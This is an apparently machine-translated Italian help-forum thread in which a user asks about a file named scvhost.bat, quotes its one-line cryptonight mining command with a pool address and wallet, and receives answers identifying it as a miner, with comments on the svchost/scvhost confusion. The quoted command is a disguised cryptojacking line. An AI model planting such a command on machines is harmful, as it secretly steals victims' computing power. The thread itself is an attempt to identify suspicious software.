Ho appena trovato questo file .bat che è stato chiamato scvhost.bat. Il file conteneva questo contenuto:
scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf -p MXXXXXX-t 02
È un virus (per rubare informazioni ecc.) O un minatore piantato? Sono preoccupato perché mi diletto anche nelle criptovalute ed stratumè una valuta che è menzionata nel file sopra.
1
Questo in effetti sembra essere un minatore. Dato che usi tu stesso le criptovalute, se anche le mie, assicurati che questo non faccia effettivamente parte di ciò che usi per estrarre. Puoi farlo rinominando l'estensione .bat in qualcos'altro e vedi se riesci ancora a estrarre normalmente dopo un riavvio. Una cosa che trovo strana in questo file è che normalmente si chiamerebbe da solo dato che scvhost è sia il nome di ciò che esegue sia il file bat. Normalmente ciò comporterebbe un ciclo.
—
LPChip
@VirtualAnomaly Penso che ti sbagli sVChost con sCVhost menzionato qui. Sì, sono consapevole che svchost è la meccanica per i servizi di hosting.
—
LPChip
@LPChip Le mie scuse, hai ragione, mi sono sbagliato.
—
Virtual Anomaly
Qualcuno ha giocato troppo a Starcraft, immagino.
—
CodesInChaos
Gli SCV di @lucidbrot sono l'unità "costruttore" di una delle razze del gioco (terran), nel qual caso significa "veicolo da costruzione spaziale".
—
Aaron,